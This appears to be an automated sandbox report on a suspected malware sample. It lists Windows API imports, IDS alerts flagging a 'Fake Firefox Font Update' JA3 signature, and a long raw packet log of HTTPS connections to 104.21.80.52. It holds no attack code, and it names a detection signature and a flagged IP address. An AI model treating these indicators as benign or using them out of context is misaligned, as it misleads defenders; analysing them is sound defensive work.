LocalFileTimeToFileTime, DosDateTimeToFileTime, CompareStringA, GetExitCodeProcess, SetThreadExecutionState, CopyFileExW, MapViewOfFile, UnmapViewOfFile, CreateMutexW, CreateFileMappingW, GetThreadLocale, IsValidCodePage, FindFirstFileExW, FreeEnvironmentStringsW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DecodePointer, WriteConsoleW, GetModuleHandleA, GlobalAlloc, GlobalFree, GetFileSizeEx, CopyFileW, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetSystemInfo, VirtualProtect, VirtualQuery, GetComputerNameW, SetCurrentDirectoryW, GetFileType, GetACP, ExitProcess, GetStdHandle, InitializeCriticalSectionAndSpinCount, SetLastError, RtlUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RaiseException, LoadLibraryExA
RPCRT4.dll | UuidCreate
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-06T23:04:46.839981+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 104.21.80.52 | 443 | TCP
2025-01-06T23:04:48.051667+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 104.21.80.52 | 443 | TCP
2025-01-06T23:04:49.124251+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 104.21.80.52 | 443 | TCP
2025-01-06T23:05:14.230605+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49911 | 104.21.80.52 | 443 | TCP
2025-01-06T23:05:15.603604+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49919 | 104.21.80.52 | 443 | TCP
2025-01-06T23:05:16.502609+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49929 | 104.21.80.52 | 443 | TCP
2025-01-06T23:05:17.372518+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49938 | 104.21.80.52 | 443 | TCP
2025-01-06T23:05:18.210322+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49946 | 104.21.80.52 | 443 | TCP
2025-01-06T23:05:19.374062+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49953 | 104.21.80.52 | 443 | TCP
2025-01-06T23:05:19.505451+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49954 | 104.21.80.52 | 443 | TCP
2025-01-06T23:05:20.486339+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49960 | 104.21.80.52 | 443 | TCP
2025-01-06T23:05:20.681592+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49966 | 104.21.80.52 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2025 23:04:02.077178001 CET | 49675 | 443 | 192.168.2.4 | 173.222.162.32
Jan 6, 2025 23:04:46.357510090 CET | 49739 | 443 | 192.168.2.4 | 104.21.80.52
Jan 6, 2025 23:04:46.357557058 CET | 443 | 49739 | 104.21.80.52 | 192.168.2.4
Jan 6, 2025 23:04:46.357636929 CET | 49739 | 443 | 192.168.2.4 | 104.21.80.52
Jan 6, 2025 23:04:46.358681917 CET | 49739 | 443 | 192.168.2.4 | 104.21.80.52
Jan 6, 2025 23:04:46.358699083 CET | 443 | 49739 | 104.21.80.52 | 192.168.2.4
Jan 6, 2025 23:04:46.839904070 CET | 443 | 49739 | 104.21.80.52 | 192.168.2.4
Jan 6, 2025 23:04:46.839981079 CET | 49739 | 443 | 192.168.2.4 | 104.21.80.52
Jan 6, 2025 23:04:46.845360041 CET | 49739 | 443 | 192.168.2.4 | 104.21.80.52
Jan 6, 2025 23:04:46.845370054 CET | 443 | 49739 | 104.21.80.52 | 192.168.2.4
Jan 6, 2025 23:04:46.845578909 CET | 443 | 49739 | 104.21.80.52 | 192.168.2.4
Jan 6, 2025 23:04:46.889775991 CET | 49739 | 443 | 192.168.2.4 | 104.21.80.52
Jan 6, 2025 23:04:46.891231060 CET | 49739 | 443 | 192.168.2.4 | 104.21.80.52
Jan 6, 2025 23:04:46.891251087 CET | 49739 | 443 | 192.168.2.4 | 104.21.80.52
Jan 6, 2025 23:04:46.891258001 CET | 443 | 49739 | 104.21.80.52 | 192.168.2.4
Jan 6, 2025 23:04:47.305699110 CET | 443 | 49739 | 104.21.80.52 | 192.168.2.4
Jan 6, 2025 23:04:47.305740118 CET | 443 | 49739 | 104.21.80.52 | 192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305778980 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305810928 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305844069 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305865049 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.305877924 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305898905 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.305921078 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305952072 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305984974 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.305999041 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.306006908 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.306035995 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.306056023 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.306061983 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.306149006 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.389642000 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396153927 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396183968 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396305084 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.396315098 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396420956 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396440983 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.396449089 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396496058 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396524906 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396544933 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.396552086 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.396574974 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.397340059 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.397371054 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.397409916 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.397556067 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.397563934 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398068905 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398108006 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398127079 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.398133993 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398169041 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398277998 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.398284912 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.398473978 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.398952007 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.399008989 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.399034023 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.399058104 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.399065018 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.399141073 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.475261927 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487147093 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487179995 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487207890 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487236977 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487301111 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487338066 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.487349033 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.487400055 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.488094091 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.488478899 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.488507986 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.488528967 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.488534927 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.488559008 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.488603115 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.493460894 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.493784904 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.493784904 CET49739443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.493794918 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.493803024 CET44349739104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.563163042 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.563200951 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:47.563355923 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.563591957 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:47.563607931 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.051574945 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.051666975 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.104712963 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.104732990 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.104955912 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.112519026 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.112541914 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.112549067 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.413940907 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.414031029 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.414093971 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.420449972 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.420464993 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.420475960 CET49740443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.420480013 CET44349740104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.632678986 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.632723093 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:48.632807970 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.633398056 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:48.633410931 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.124183893 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.124250889 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.125446081 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.125453949 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.125680923 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.126553059 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.126568079 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.126573086 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.464968920 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.465027094 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.465131998 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.465270042 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.465281963 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:04:49.465300083 CET49741443192.168.2.4104.21.80.52
                                                                                                                                                            Jan 6, 2025 23:04:49.465307951 CET44349741104.21.80.52192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:02.587474108 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:02.587502003 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:02.587548018 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:02.587836027 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:02.587850094 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.367721081 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.371351957 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.371366978 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.371787071 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.371800900 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.371913910 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.371922016 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.372025013 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.372622967 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.376064062 CET49768443192.168.2.4142.250.186.97
                                                                                                                                                            Jan 6, 2025 23:05:03.376135111 CET44349768142.250.186.97192.168.2.4
                                                                                                                                                            Jan 6, 2025 23:05:03.376410961 CET49768443192.168.2.4142.250.186.97
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Jan 6, 2025 23:05:03.376419067 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.475147009 CET    49786        443        192.168.2.4      18.244.18.32
Jan 6, 2025 23:05:03.475164890 CET    443          49786      18.244.18.32     192.168.2.4
Jan 6, 2025 23:05:03.475239992 CET    49786        443        192.168.2.4      18.244.18.32
Jan 6, 2025 23:05:03.475924969 CET    49786        443        192.168.2.4      18.244.18.32
Jan 6, 2025 23:05:03.475938082 CET    443          49786      18.244.18.32     192.168.2.4
Jan 6, 2025 23:05:03.531124115 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.646924019 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.646974087 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.647011995 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.647039890 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.647068024 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.647085905 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.647114038 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.652173996 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.652249098 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.652256966 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.658302069 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.658375978 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.658382893 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.664586067 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.664779902 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.664787054 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.670912027 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.671055079 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.671061993 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.677167892 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.678360939 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.678368092 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.683355093 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.683474064 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.683480978 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.733401060 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.733438015 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.733468056 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.733470917 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.733479977 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.733850956 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.738236904 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.738368034 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.738377094 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.744532108 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.745183945 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.745192051 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.750833988 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.750943899 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.750951052 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.757016897 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.757157087 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.757164001 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.763336897 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.763475895 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.763483047 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.769573927 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.771203995 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.771210909 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.775994062 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.776110888 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.776117086 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.781682968 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.781785011 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.781791925 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.787151098 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.787739992 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.787745953 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.792567968 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.792732000 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.792738914 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.797992945 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.798119068 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.798125029 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.803386927 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.803495884 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.803503036 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.808824062 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.808912992 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.808921099 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.814284086 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.814457893 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.814464092 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.824198008 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.824234009 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.824260950 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.824266911 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.824529886 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.824534893 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.827642918 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.827862978 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.827869892 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.831285000 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.831381083 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.831388950 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.834790945 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.835503101 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.835513115 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.838370085 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.838685036 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.838690996 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.841734886 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.841818094 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.841824055 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.845211983 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.845457077 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.845463991 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.848706007 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.848778963 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.848786116 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.852247953 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.852370977 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.852379084 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.855842113 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.855950117 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.855957985 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.859200001 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.859415054 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.859421015 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.862677097 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.862736940 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.862742901 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.866355896 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.866739035 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.866750956 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.869672060 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.869885921 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.869893074 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.873630047 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.874026060 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.874032974 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.876810074 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.877363920 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.877374887 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.880088091 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.881002903 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.881010056 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.883586884 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.885160923 CET    49768        443        192.168.2.4      142.250.186.97
Jan 6, 2025 23:05:03.885166883 CET    443          49768      142.250.186.97   192.168.2.4
Jan 6, 2025 23:05:03.888607979 CET    443          49768      142.250.186.97   192.168.2.4
